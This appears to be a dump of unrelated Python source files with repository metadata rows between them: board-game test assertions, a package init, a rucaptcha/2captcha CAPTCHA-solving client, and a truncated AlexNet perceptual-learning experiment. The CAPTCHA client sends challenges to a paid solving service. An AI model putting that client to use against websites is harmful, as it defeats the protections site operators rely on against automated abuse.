assert gamma_move(board, 4, 6, 6) == 1
assert gamma_busy_fields(board, 4) == 1
assert gamma_move(board, 5, 4, 7) == 0
assert gamma_move(board, 1, 5, 6) == 1
assert gamma_move(board, 1, 0, 1) == 1
assert gamma_move(board, 2, 0, 1) == 0
assert gamma_move(board, 3, 4, 2) == 0
assert gamma_move(board, 3, 7, 4) == 1
assert gamma_move(board, 4, 6, 1) == 1
assert gamma_move(board, 4, 5, 3) == 1
assert gamma_move(board, 5, 0, 6) == 1
assert gamma_move(board, 2, 3, 1) == 1
assert gamma_move(board, 2, 5, 1) == 1
assert gamma_move(board, 3, 0, 3) == 1
assert gamma_busy_fields(board, 3) == 6
assert gamma_move(board, 4, 4, 0) == 1
assert gamma_move(board, 5, 6, 4) == 1
assert gamma_move(board, 5, 5, 5) == 1
assert gamma_move(board, 1, 0, 5) == 1
assert gamma_busy_fields(board, 1) == 5
assert gamma_golden_move(board, 1, 2, 4) == 0
assert gamma_move(board, 2, 5, 6) == 0
assert gamma_move(board, 2, 0, 2) == 1
assert gamma_move(board, 3, 1, 5) == 1
assert gamma_move(board, 3, 3, 3) == 0
assert gamma_move(board, 4, 5, 1) == 0
assert gamma_move(board, 5, 3, 2) == 1
assert gamma_busy_fields(board, 5) == 6
assert gamma_move(board, 1, 6, 6) == 0
assert gamma_golden_possible(board, 1) == 1
assert gamma_move(board, 2, 2, 3) == 1
assert gamma_golden_possible(board, 2) == 1
assert gamma_move(board, 3, 2, 2) == 1
assert gamma_move(board, 4, 6, 5) == 1
assert gamma_move(board, 4, 6, 1) == 0
assert gamma_free_fields(board, 4) == 25
assert gamma_move(board, 5, 2, 4) == 1
assert gamma_move(board, 5, 3, 3) == 0
assert gamma_golden_move(board, 5, 6, 3) == 0
assert gamma_move(board, 1, 7, 3) == 1
assert gamma_move(board, 2, 1, 5) == 0
assert gamma_move(board, 2, 6, 4) == 0
assert gamma_move(board, 3, 7, 2) == 1
assert gamma_busy_fields(board, 3) == 9
board501668135 = gamma_board(board)
assert board501668135 is not None
assert board501668135 == ("5..2.14.\n"
"13.3.54.\n"
"..513.53\n"
"3.2354.1\n"
"2.352.23\n"
"1.32124.\n"
"..5.4...\n")
del board501668135
board501668135 = None
assert gamma_busy_fields(board, 4) == 5
assert gamma_move(board, 5, 5, 7) == 0
assert gamma_move(board, 5, 4, 4) == 0
assert gamma_move(board, 1, 0, 6) == 0
assert gamma_move(board, 1, 5, 6) == 0
assert gamma_move(board, 2, 0, 7) == 0
assert gamma_move(board, 3, 0, 1) == 0
assert gamma_free_fields(board, 3) == 22
assert gamma_move(board, 4, 2, 5) == 1
assert gamma_move(board, 1, 4, 5) == 1
assert gamma_move(board, 2, 0, 1) == 0
assert gamma_move(board, 2, 2, 1) == 0
assert gamma_move(board, 3, 6, 1) == 0
assert gamma_move(board, 3, 1, 0) == 1
assert gamma_move(board, 4, 3, 6) == 0
assert gamma_move(board, 4, 7, 0) == 1
assert gamma_free_fields(board, 4) == 18
assert gamma_golden_move(board, 4, 5, 0) == 0
assert gamma_move(board, 5, 4, 0) == 0
assert gamma_move(board, 5, 2, 6) == 1
assert gamma_move(board, 1, 5, 2) == 1
assert gamma_free_fields(board, 1) == 16
assert gamma_move(board, 2, 6, 4) == 0
assert gamma_move(board, 2, 4, 0) == 0
board446793647 = gamma_board(board)
assert board446793647 is not None
assert board446793647 == ("5.52.14.\n"
"1343154.\n"
"..513.53\n"
"3.2354.1\n"
"2.352123\n"
"1.32124.\n"
".35.4..4\n")
del board446793647
board446793647 = None
assert gamma_move(board, 3, 3, 1) == 0
assert gamma_move(board, 3, 2, 5) == 0
assert gamma_move(board, 4, 3, 1) == 0
assert gamma_move(board, 5, 5, 4) == 1
assert gamma_move(board, 5, 7, 5) == 1
assert gamma_move(board, 1, 4, 1) == 0
assert gamma_move(board, 1, 6, 5) == 0
assert gamma_busy_fields(board, 1) == 8
assert gamma_move(board, 2, 4, 6) == 1
assert gamma_busy_fields(board, 2) == 8
assert gamma_move(board, 3, 0, 5) == 0
assert gamma_busy_fields(board, 3) == 10
assert gamma_free_fields(board, 3) == 13
assert gamma_move(board, 4, 3, 5) == 0
assert gamma_golden_possible(board, 4) == 1
assert gamma_move(board, 5, 2, 6) == 0
assert gamma_move(board, 5, 4, 1) == 0
assert gamma_golden_possible(board, 5) == 1
assert gamma_move(board, 1, 4, 0) == 0
assert gamma_move(board, 2, 1, 4) == 1
assert gamma_move(board, 2, 0, 0) == 1
assert gamma_golden_possible(board, 2) == 1
assert gamma_move(board, 3, 2, 1) == 0
assert gamma_move(board, 4, 3, 6) == 0
assert gamma_move(board, 4, 0, 1) == 0
assert gamma_move(board, 5, 6, 5) == 0
assert gamma_move(board, 1, 3, 1) == 0
assert gamma_move(board, 3, 3, 6) == 0
assert gamma_move(board, 4, 3, 6) == 0
assert gamma_move(board, 5, 1, 4) == 0
assert gamma_move(board, 1, 5, 5) == 0
board453730818 = gamma_board(board)
assert board453730818 is not None
assert board453730818 == ("5.52214.\n"
"13431545\n"
".2513553\n"
"3.2354.1\n"
"2.352123\n"
"1.32124.\n"
"235.4..4\n")
del board453730818
board453730818 = None
assert gamma_move(board, 2, 3, 6) == 0
assert gamma_move(board, 2, 2, 0) == 0
assert gamma_free_fields(board, 2) == 11
assert gamma_move(board, 3, 6, 1) == 0
assert gamma_busy_fields(board, 3) == 10
assert gamma_golden_move(board, 4, 3, 7) == 0
assert gamma_move(board, 5, 0, 5) == 0
assert gamma_move(board, 5, 1, 5) == 0
board562456424 = gamma_board(board)
assert board562456424 is not None
assert board562456424 == ("5.52214.\n"
"13431545\n"
".2513553\n"
"3.2354.1\n"
"2.352123\n"
"1.32124.\n"
"235.4..4\n")
del board562456424
board562456424 = None
assert gamma_move(board, 1, 4, 2) == 0
assert gamma_move(board, 1, 1, 3) == 1
assert gamma_free_fields(board, 1) == 10
assert gamma_move(board, 2, 3, 2) == 0
assert gamma_free_fields(board, 2) == 10
assert gamma_move(board, 3, 3, 2) == 0
assert gamma_move(board, 3, 1, 6) == 1
assert gamma_move(board, 4, 0, 6) == 0
assert gamma_move(board, 5, 0, 2) == 0
assert gamma_move(board, 1, 1, 7) == 0
assert gamma_golden_possible(board, 1) == 1
assert gamma_move(board, 2, 1, 0) == 0
assert gamma_busy_fields(board, 2) == 10
assert gamma_move(board, 3, 6, 6) == 0
assert gamma_move(board, 3, 0, 6) == 0
assert gamma_free_fields(board, 3) == 9
assert gamma_move(board, 4, 6, 7) == 0
assert gamma_move(board, 4, 7, 4) == 0
assert gamma_golden_possible(board, 4) == 1
assert gamma_golden_move(board, 4, 1, 3) == 1
assert gamma_move(board, 5, 0, 5) == 0
assert gamma_move(board, 5, 2, 4) == 0
assert gamma_move(board, 1, 0, 3) == 0
assert gamma_move(board, 1, 0, 6) == 0
assert gamma_move(board, 2, 3, 6) == 0
assert gamma_golden_possible(board, 2) == 1
assert gamma_move(board, 3, 5, 5) == 0
assert gamma_move(board, 4, 3, 6) == 0
assert gamma_move(board, 5, 0, 3) == 0
assert gamma_move(board, 5, 3, 0) == 1
assert gamma_move(board, 1, 2, 3) == 0
assert gamma_move(board, 2, 4, 0) == 0
assert gamma_move(board, 3, 2, 1) == 0
assert gamma_move(board, 3, 4, 0) == 0
assert gamma_move(board, 4, 4, 0) == 0
assert gamma_free_fields(board, 4) == 8
assert gamma_move(board, 5, 2, 1) == 0
assert gamma_move(board, 1, 2, 1) == 0
assert gamma_move(board, 2, 3, 6) == 0
assert gamma_move(board, 2, 0, 4) == 1
assert gamma_move(board, 3, 0, 6) == 0
assert gamma_move(board, 5, 3, 6) == 0
assert gamma_move(board, 5, 3, 2) == 0
assert gamma_move(board, 1, 1, 1) == 1
assert gamma_move(board, 1, 7, 2) == 0
assert gamma_move(board, 2, 1, 7) == 0
assert gamma_move(board, 2, 3, 3) == 0
assert gamma_move(board, 3, 0, 1) == 0
assert gamma_move(board, 3, 3, 6) == 0
assert gamma_move(board, 4, 0, 5) == 0
assert gamma_move(board, 4, 1, 1) == 0
assert gamma_move(board, 5, 0, 5) == 0
assert gamma_busy_fields(board, 5) == 11
assert gamma_move(board, 1, 0, 6) == 0
board779428978 = gamma_board(board)
assert board779428978 is not None
assert board779428978 == ("5352214.\n"
"13431545\n"
"22513553\n"
"342354.1\n"
"2.352123\n"
"1132124.\n"
"23554..4\n")
del board779428978
board779428978 = None
assert gamma_move(board, 2, 2, 1) == 0
assert gamma_move(board, 3, 1, 7) == 0
assert gamma_move(board, 3, 3, 1) == 0
assert gamma_busy_fields(board, 3) == 11
assert gamma_golden_possible(board, 3) == 1
assert gamma_move(board, 4, 2, 1) == 0
board764419175 = gamma_board(board)
assert board764419175 is not None
assert board764419175 == ("5352214.\n"
"13431545\n"
"22513553\n"
"342354.1\n"
"2.352123\n"
"1132124.\n"
"23554..4\n")
del board764419175
board764419175 = None
assert gamma_move(board, 5, 2, 4) == 0
assert gamma_golden_possible(board, 5) == 1
assert gamma_move(board, 1, 4, 0) == 0
assert gamma_move(board, 2, 1, 4) == 0
assert gamma_busy_fields(board, 2) == 11
assert gamma_move(board, 3, 0, 6) == 0
assert gamma_move(board, 3, 4, 0) == 0
assert gamma_free_fields(board, 3) == 6
assert gamma_golden_possible(board, 3) == 1
assert gamma_move(board, 4, 6, 6) == 0
assert gamma_move(board, 4, 5, 5) == 0
assert gamma_move(board, 5, 3, 6) == 0
assert gamma_move(board, 5, 1, 0) == 0
board285942831 = gamma_board(board)
assert board285942831 is not None
assert board285942831 == ("5352214.\n"
"13431545\n"
"22513553\n"
"342354.1\n"
"2.352123\n"
"1132124.\n"
"23554..4\n")
del board285942831
board285942831 = None
assert gamma_move(board, 1, 0, 6) == 0
assert gamma_move(board, 1, 0, 0) == 0
assert gamma_golden_possible(board, 1) == 1
assert gamma_move(board, 2, 1, 7) == 0
assert gamma_move(board, 2, 2, 3) == 0
assert gamma_golden_move(board, 2, 4, 6) == 0
gamma_delete(board)
| 31.974843
| 46
| 0.663847
| 1,869
| 10,168
| 3.46656
| 0.038523
| 0.341256
| 0.356537
| 0.475382
| 0.835468
| 0.827751
| 0.729434
| 0.506251
| 0.423985
| 0.392808
| 0
| 0.164819
| 0.174764
| 10,168
| 317
| 47
| 32.07571
| 0.607317
| 0
| 0
| 0.333333
| 0
| 0
| 0.048611
| 0
| 0
| 0
| 0
| 0
| 0.742268
| 1
| 0
| false
| 0
| 0.003436
| 0
| 0.003436
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
6572fe35d7f6aed1386b36c42d475fe2a5dbd3d3
| 315
|
py
|
Python
|
src/node/ext/ugm/__init__.py
|
zworkb/node.ext.ugm
|
896b1b9b115a875be86a5ba3fbad66c0c417d9ce
|
[
"BSD-3-Clause"
] | 1
|
2019-07-09T12:47:16.000Z
|
2019-07-09T12:47:16.000Z
|
src/node/ext/ugm/__init__.py
|
zworkb/node.ext.ugm
|
896b1b9b115a875be86a5ba3fbad66c0c417d9ce
|
[
"BSD-3-Clause"
] | null | null | null |
src/node/ext/ugm/__init__.py
|
zworkb/node.ext.ugm
|
896b1b9b115a875be86a5ba3fbad66c0c417d9ce
|
[
"BSD-3-Clause"
] | 1
|
2020-12-22T10:36:03.000Z
|
2020-12-22T10:36:03.000Z
|
from node.ext.ugm._api import Group # noqa
from node.ext.ugm._api import Groups # noqa
from node.ext.ugm._api import Principal # noqa
from node.ext.ugm._api import Principals # noqa
from node.ext.ugm._api import Ugm # noqa
from node.ext.ugm._api import User # noqa
from node.ext.ugm._api import Users # noqa
| 39.375
| 48
| 0.755556
| 56
| 315
| 4.125
| 0.232143
| 0.242424
| 0.333333
| 0.424242
| 0.800866
| 0.800866
| 0.701299
| 0
| 0
| 0
| 0
| 0
| 0.155556
| 315
| 7
| 49
| 45
| 0.868421
| 0.107937
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 10
|
657b42430178b4c0926116c69ec02a5c5d289b80
| 8,530
|
py
|
Python
|
python_rucaptcha/TextCaptcha.py
|
MasterScott/python-rucaptcha
|
187e06511384dbbd52d16d68056c7b7b0c5ab5a3
|
[
"MIT"
] | 70
|
2017-08-04T14:20:19.000Z
|
2022-02-26T21:13:09.000Z
|
python_rucaptcha/TextCaptcha.py
|
MasterScott/python-rucaptcha
|
187e06511384dbbd52d16d68056c7b7b0c5ab5a3
|
[
"MIT"
] | 56
|
2017-08-05T22:51:01.000Z
|
2022-03-25T10:47:57.000Z
|
python_rucaptcha/TextCaptcha.py
|
MasterScott/python-rucaptcha
|
187e06511384dbbd52d16d68056c7b7b0c5ab5a3
|
[
"MIT"
] | 28
|
2017-08-08T11:21:12.000Z
|
2022-03-27T12:39:19.000Z
|
import time
import asyncio
import aiohttp
import requests
from python_rucaptcha.config import app_key
from python_rucaptcha.decorators import api_key_check, service_check
from python_rucaptcha.result_handler import get_sync_result, get_async_result
class TextCaptcha:
def __init__(
self,
rucaptcha_key: str,
sleep_time: int = 5,
service_type: str = "2captcha",
pingback: str = None,
**kwargs,
):
"""
Инициализация нужных переменных.
:param rucaptcha_key: АПИ ключ капчи из кабинета пользователя
:param sleep_time: Время ожидания решения капчи
:param service_type: URL с которым будет работать программа, возможен вариант "2captcha"(стандартный)
и "rucaptcha"
:param pingback: Параметр для ссылки с на которой будет ожидание callback ответа от RuCaptcha
:param kwargs: Для передачи дополнительных параметров
"""
# время ожидания решения капчи
self.sleep_time = sleep_time
# тип URL на с которым будет работать библиотека
self.service_type = service_type
# пайлоад POST запроса на отправку капчи на сервер
self.post_payload = {"key": rucaptcha_key, "method": "post", "json": 1, "soft_id": app_key}
# если был передан параметр для callback`a - добавляем его
if pingback:
self.post_payload.update({"pingback": pingback})
# Если переданы ещё параметры - вносим их в post_payload
if kwargs:
for key in kwargs:
self.post_payload.update({key: kwargs[key]})
# пайлоад GET запроса на получение результата решения капчи
self.get_payload = {"key": rucaptcha_key, "action": "get", "json": 1}
def __enter__(self):
return self
def __exit__(self, exc_type, exc_value, traceback):
if exc_type:
return False
return True
@api_key_check
@service_check
def captcha_handler(self, captcha_text: str, **kwargs):
"""
Метод отвечает за передачу данных на сервер для решения капчи
:param captcha_text: Текстовый вопрос
:param kwargs: Для передачи дополнительных параметров
:return: Ответ на капчу в виде JSON строки с полями:
captchaSolve - решение капчи,
taskId - находится Id задачи на решение капчи, можно использовать при жалобах и прочем,
error - False - если всё хорошо, True - если есть ошибка,
errorBody - название ошибки
"""
# result, url_request, url_response - задаются в декораторе `service_check`, после проверки переданного названия
# Если переданы ещё параметры - вносим их в get_payload
if kwargs:
for key in kwargs:
self.get_payload.update({key: kwargs[key]})
# вводим текст капчи, выбираем метод ПОСТ и ждём ответа. в JSON-формате
self.post_payload.update({"textcaptcha": captcha_text})
# Отправляем на рукапча текст капчи и ждём ответа
# в результате получаем JSON ответ с номером решаемой капчи
captcha_id = requests.post(self.url_request, data=self.post_payload).json()
# если вернулся ответ с ошибкой то записываем её и возвращаем результат
if captcha_id["status"] == 0:
self.result.update({"error": True, "errorBody": captcha_id["request"]})
return self.result
# иначе берём ключ отправленной на решение капчи и ждём решения
else:
captcha_id = captcha_id["request"]
# вписываем в taskId ключ отправленной на решение капчи
self.result.update({"taskId": captcha_id})
# обновляем пайлоад, вносим в него ключ отправленной на решение капчи
self.get_payload.update({"id": captcha_id})
# если передан параметр `pingback` - не ждём решения капчи а возвращаем незаполненный ответ
if self.post_payload.get("pingback"):
return self.get_payload
else:
# Ожидаем решения капчи
time.sleep(self.sleep_time)
return get_sync_result(
get_payload=self.get_payload,
sleep_time=self.sleep_time,
url_response=self.url_response,
result=self.result,
)
# асинхронный метод для решения текстовой капчи
class aioTextCaptcha:
def __init__(
self,
rucaptcha_key: str,
sleep_time: int = 5,
service_type: str = "2captcha",
pingback: str = None,
**kwargs,
):
"""
Инициализация нужных переменных.
:param rucaptcha_key: АПИ ключ капчи из кабинета пользователя
:param sleep_time: Время ожидания решения капчи
:param service_type: URL с которым будет работать программа, возможен вариант "2captcha"(стандартный)
и "rucaptcha"
:param pingback: Параметр для ссылки с на которой будет ожидание callback ответа от RuCaptcha
:param kwargs: Для передачи дополнительных параметров
"""
# время ожидания решения капчи
self.sleep_time = sleep_time
# тип URL на с которым будет работать библиотека
self.service_type = service_type
# пайлоад POST запроса на отправку капчи на сервер
self.post_payload = {"key": rucaptcha_key, "method": "post", "json": 1, "soft_id": app_key}
# если был передан параметр для callback`a - добавляем его
if pingback:
self.post_payload.update({"pingback": pingback})
# Если переданы ещё параметры - вносим их в post_payload
if kwargs:
for key in kwargs:
self.post_payload.update({key: kwargs[key]})
# пайлоад GET запроса на получение результата решения капчи
self.get_payload = {"key": rucaptcha_key, "action": "get", "json": 1}
def __enter__(self):
return self
def __exit__(self, exc_type, exc_value, traceback):
if exc_type:
return False
return True
@api_key_check
@service_check
async def captcha_handler(self, captcha_text: str, **kwargs):
"""
Метод отвечает за передачу данных на сервер для решения капчи
:param captcha_text: Текстовый вопрос
:param kwargs: Для передачи дополнительных параметров
:return: Ответ на капчу в виде JSON строки с полями:
captchaSolve - решение капчи,
taskId - находится Id задачи на решение капчи, можно использовать при жалобах и прочем,
error - False - если всё хорошо, True - если есть ошибка,
errorBody - название ошибки
"""
# result, url_request, url_response - задаются в декораторе `service_check`, после проверки переданного названия
# Если переданы ещё параметры - вносим их в get_payload
if kwargs:
for key in kwargs:
self.get_payload.update({key: kwargs[key]})
# вводим текст капчи, выбираем метод ПОСТ и ждём ответа. в JSON-формате
self.post_payload.update({"textcaptcha": captcha_text})
# получаем ID капчи
async with aiohttp.ClientSession() as session:
async with session.post(self.url_request, data=self.post_payload) as resp:
captcha_id = await resp.json()
# если вернулся ответ с ошибкой то записываем её и возвращаем результат
if captcha_id["status"] == 0:
self.result.update({"error": True, "errorBody": captcha_id["request"]})
return self.result
# иначе берём ключ отправленной на решение капчи и ждём решения
else:
captcha_id = captcha_id["request"]
# вписываем в taskId ключ отправленной на решение капчи
self.result.update({"taskId": captcha_id})
# обновляем пайлоад, вносим в него ключ отправленной на решение капчи
self.get_payload.update({"id": captcha_id})
# если передан параметр `pingback` - не ждём решения капчи а возвращаем незаполненный ответ
if self.post_payload.get("pingback"):
return self.get_payload
else:
# Ожидаем решения капчи
await asyncio.sleep(self.sleep_time)
return await get_async_result(
get_payload=self.get_payload,
sleep_time=self.sleep_time,
url_response=self.url_response,
result=self.result,
)
| 41.813725
| 120
| 0.634818
| 1,002
| 8,530
| 5.256487
| 0.190619
| 0.023923
| 0.034175
| 0.023923
| 0.90469
| 0.891209
| 0.891209
| 0.891209
| 0.87716
| 0.87716
| 0
| 0.001996
| 0.295311
| 8,530
| 203
| 121
| 42.019704
| 0.874231
| 0.398945
| 0
| 0.803738
| 0
| 0
| 0.051125
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.065421
| false
| 0
| 0.065421
| 0.018692
| 0.261682
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
65dda4a624a4c8719b0c4847139fe34c1af632c4
| 86
|
py
|
Python
|
lib/pages/hello.py
|
students-using-ai-for-good/people-matcher
|
5d247f9cf32d59c8d629a5be4bf998fa3a96c9aa
|
[
"MIT"
] | 1
|
2020-06-20T05:38:50.000Z
|
2020-06-20T05:38:50.000Z
|
lib/pages/hello.py
|
students-using-ai-for-good/people-matcher
|
5d247f9cf32d59c8d629a5be4bf998fa3a96c9aa
|
[
"MIT"
] | null | null | null |
lib/pages/hello.py
|
students-using-ai-for-good/people-matcher
|
5d247f9cf32d59c8d629a5be4bf998fa3a96c9aa
|
[
"MIT"
] | 1
|
2020-11-08T04:04:33.000Z
|
2020-11-08T04:04:33.000Z
|
import dash_html_components as html
def get_layout():
return html.Div("Hello!")
| 14.333333
| 35
| 0.732558
| 13
| 86
| 4.615385
| 0.846154
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.162791
| 86
| 5
| 36
| 17.2
| 0.833333
| 0
| 0
| 0
| 0
| 0
| 0.069767
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| true
| 0
| 0.333333
| 0.333333
| 1
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 1
| 1
| 1
| 0
|
0
| 7
|
02a2d0f6638fd7a10e7643497804d59184f06e46
| 72,453
|
py
|
Python
|
src/smaller_variants_AlexNet_experiment.py
|
aslansd/DNNforVPL
|
7cda3eb327050f98b0867a4eca4cadb813d2c466
|
[
"MIT"
] | null | null | null |
src/smaller_variants_AlexNet_experiment.py
|
aslansd/DNNforVPL
|
7cda3eb327050f98b0867a4eca4cadb813d2c466
|
[
"MIT"
] | null | null | null |
src/smaller_variants_AlexNet_experiment.py
|
aslansd/DNNforVPL
|
7cda3eb327050f98b0867a4eca4cadb813d2c466
|
[
"MIT"
] | null | null | null |
"""
Created by Aslan Satary Dizaji (a.satarydizaji@eni-g.de)
"""
import copy
import gc
import glob
import numpy as np
import os
import random
import scipy.io
import shutil
import time
import torch
import torch.backends.cudnn as cudnn
import torch.nn as nn
import torch.optim
import torchvision.transforms as transforms
from PIL import Image
from scipy.spatial.distance import pdist, squareform
from torch.hub import load_state_dict_from_url
from intrinsic_dimension_2NN import estimate
from smaller_variants_AlexNet_model import DNNforVPL_1, DNNforVPL_2, DNNforVPL_3, DNNforVPL_4, DNNforVPL_5
from reading_stimuli import reading_stimuli
# The pretrained weights of AlexNet
model_urls = {'alexnet': 'https://download.pytorch.org/models/alexnet-owt-4df8aa71.pth'}
pretrained_dict = load_state_dict_from_url(model_urls['alexnet'])
### A class for formatting different metrics of accuracy during training and transfer
class AverageMeter(object):
"""Computes and stores the average and current values"""
def __init__(self, name, fmt = ':f'):
self.name = name
self.fmt = fmt
self.reset()
def reset(self):
self.val = 0
self.avg = 0
self.sum = 0
self.count = 0
def update(self, val, n = 1):
self.val = val
self.sum += val * n
self.count += n
self.avg = self.sum / self.count
def __str__(self):
fmtstr = '{name} {val' + self.fmt + '}'
if self.name == 'Accuracy':
self.__dict__['val'] = self.val.item()
self.__dict__['avg'] = self.avg.item()
self.__dict__['sum'] = self.sum.item()
output = fmtstr.format(**self.__dict__)
else:
output = fmtstr.format(**self.__dict__)
return output
### A class for showing a progress bar during training and transfer
class ProgressMeter(object):
def __init__(self, num_batches, meters, prefix = ""):
self.batch_fmtstr = self._get_batch_fmtstr(num_batches)
self.meters = meters
self.prefix = prefix
def display(self, batch):
entries = [self.prefix + self.batch_fmtstr.format(batch)]
entries += [str(meter) for meter in self.meters]
print('\t'.join(entries))
def _get_batch_fmtstr(self, num_batches):
num_digits = len(str(num_batches // 1))
fmt = '{:' + str(num_digits) + 'd}'
return '[' + fmt + '/' + fmt.format(num_batches) + ']'
### A function for computing accuracy during training and transfer
def accuracy(output, target, topk = 1):
"""Computes the accuracy over the top1 predictions"""
with torch.no_grad():
batch_size = target.size(0)
_, pred = output.topk(1, 1, True, True)
pred = pred.t()
correct = pred.eq(target.view(1, -1).expand_as(pred))
res = []
correct_k = correct[:1].view(-1).float().sum(0, keepdim = True)
res.append(correct_k.mul_(100.0 / batch_size))
return res
### A function for adjusting the learning rate during training
def adjust_learning_rate(optimizer, session, lr):
"""Sets the learning rate to the initial LR decayed by 2 every 1 session"""
lr = lr * (0.5 ** (session))
for param_group in optimizer.param_groups:
param_group['lr'] = lr
### A function for saving the checkpoints during training
def save_checkpoint(state, is_best, group, filename):
""" Saves the checkpoints during training """
torch.save(state, filename)
if is_best:
shutil.copyfile(filename, 'DNNforVPL_best_' + group + '.pth.tar')
### A fucntion which performs different experiments with the smaller variants of AlexNet
def smaller_variants_alexnet(parent_folder = 'Smaller Variants of Alexnet_New Results', number_simulation = 5, num_sample_artiphysiology = 1000):
### Initializing the main variables
x_sample_artiphysiology_index = np.zeros((num_sample_artiphysiology, 3), dtype = np.int64)
for i in range(0, num_sample_artiphysiology):
x_sample_artiphysiology_index[i, 0] = random.randrange(1)
x_sample_artiphysiology_index[i, 1] = random.randrange(20)
x_sample_artiphysiology_index[i, 2] = random.randrange(180)
number_model = 5
number_group = 4
all_simulation_training_accuracy = []
all_simulation_transfer_accuracy = []
all_simulation_all_ID = []
all_x_sample_ID = []
all_simulation_training_accuracy_permuted = []
all_simulation_all_ID_permuted = []
for i in range(number_model):
number_layer = number_model
all_simulation_training_accuracy.append(np.zeros((number_simulation, number_group, 180), dtype = np.float32))
all_simulation_transfer_accuracy.append(np.zeros((number_simulation, number_group, 10), dtype = np.float32))
all_simulation_all_ID.append(np.zeros((number_simulation, number_group, number_layer, 19), dtype = np.float32))
all_x_sample_ID.append(np.zeros((number_simulation, number_group), dtype = np.float32))
all_simulation_training_accuracy_permuted.append(np.zeros((number_simulation, number_group, 180), dtype = np.float32))
all_simulation_all_ID_permuted.append(np.zeros((number_simulation, number_group, number_layer, 19), dtype = np.float32))
os.mkdir(parent_folder)
for simulation_counter in range(number_simulation):
print('Simulation: ', simulation_counter + 1)
os.mkdir(parent_folder + '/Simulation_' + str(simulation_counter + 1))
group_counter = -1
for group_training in ['group1', 'group2', 'group3', 'group4']:
gc.collect()
best_acc1 = 0
group_counter = group_counter + 1
print('Group: ', group_training)
os.mkdir(parent_folder + '/Simulation_' + str(simulation_counter + 1) + '/' + group_training)
### Training Stimuli
# The structure of image names in different groups
if group_training == 'group1':
SF_training = [170]
Ori_training = [23325, 23350, 23375, 23400, 23425, 23450, 23475, 23500, 23525, 23550,
23650, 23675, 23700, 23725, 23750, 23775, 23800, 23825, 23850, 23875]
elif group_training == 'group2':
SF_training = [53, 170, 276]
Ori_training = [23325, 23350, 23375, 23400, 23425, 23450, 23475, 23500, 23525, 23550,
23650, 23675, 23700, 23725, 23750, 23775, 23800, 23825, 23850, 23875]
elif group_training == 'group3':
SF_training = [170]
Ori_training = [23075, 23100, 23125, 23150, 23175, 23200, 23225, 23250, 23275, 23300,
23900, 23925, 23950, 23975, 24000, 24025, 24050, 24075, 24100, 24125]
elif group_training == 'group4':
SF_training = [53, 170, 276]
Ori_training = [23075, 23100, 23125, 23150, 23175, 23200, 23225, 23250, 23275, 23300,
23900, 23925, 23950, 23975, 24000, 24025, 24050, 24075, 24100, 24125]
# Reading all images
if group_training == 'group1' or group_training == 'group2':
file_name_paths = glob.glob(os.path.dirname(os.path.abspath("./")) + '/data/stimuli/training_groups1&2/*.TIFF')
elif group_training == 'group3' or group_training == 'group4':
file_name_paths = glob.glob(os.path.dirname(os.path.abspath("./")) + '/data/stimuli/training_groups3&4/*.TIFF')
file_names = [os.path.basename(x) for x in file_name_paths]
x_val_training, y_val_training, z_val_training, x_tensor_training, y_tensor_training = reading_stimuli(file_names = file_names, file_name_paths = file_name_paths, orientation = Ori_training, spatial_frequency = SF_training)
x_tensor_training = torch.stack(x_tensor_training)
y_tensor_training = torch.stack(y_tensor_training)
print(x_tensor_training.shape, y_tensor_training.shape)
### SF Transfer Stimuli
# The structure of image names in different groups
if group_training == 'group1':
group_transfer = 'group1'
SF_transfer = [96]
Ori_transfer = [23325, 23350, 23375, 23400, 23425, 23450, 23475, 23500, 23525, 23550,
23650, 23675, 23700, 23725, 23750, 23775, 23800, 23825, 23850, 23875]
elif group_training == 'group2':
group_transfer = 'group2'
SF_transfer= [96]
Ori_transfer = [23325, 23350, 23375, 23400, 23425, 23450, 23475, 23500, 23525, 23550,
23650, 23675, 23700, 23725, 23750, 23775, 23800, 23825, 23850, 23875]
elif group_training == 'group3':
group_transfer = 'group3'
SF_transfer = [96]
Ori_transfer = [23075, 23100, 23125, 23150, 23175, 23200, 23225, 23250, 23275, 23300,
23900, 23925, 23950, 23975, 24000, 24025, 24050, 24075, 24100, 24125]
elif group_training == 'group4':
group_transfer = 'group4'
SF_transfer = [96]
Ori_transfer = [23075, 23100, 23125, 23150, 23175, 23200, 23225, 23250, 23275, 23300,
23900, 23925, 23950, 23975, 24000, 24025, 24050, 24075, 24100, 24125]
# Reading all images
if group_transfer == 'group1' or group_transfer == 'group2':
file_name_paths = glob.glob(os.path.dirname(os.path.abspath("./")) + '/data/stimuli/transferSF_groups1&2/*.TIFF')
elif group_transfer == 'group3' or group_transfer == 'group4':
file_name_paths = glob.glob(os.path.dirname(os.path.abspath("./")) + '/data/stimuli/transferSF_groups3&4/*.TIFF')
file_names = [os.path.basename(x) for x in file_name_paths]
x_val_transfer, y_val_transfer, z_val_transfer, x_tensor_transfer, y_tensor_transfer = reading_stimuli(file_names = file_names, file_name_paths = file_name_paths, orientation = Ori_transfer, spatial_frequency = SF_transfer)
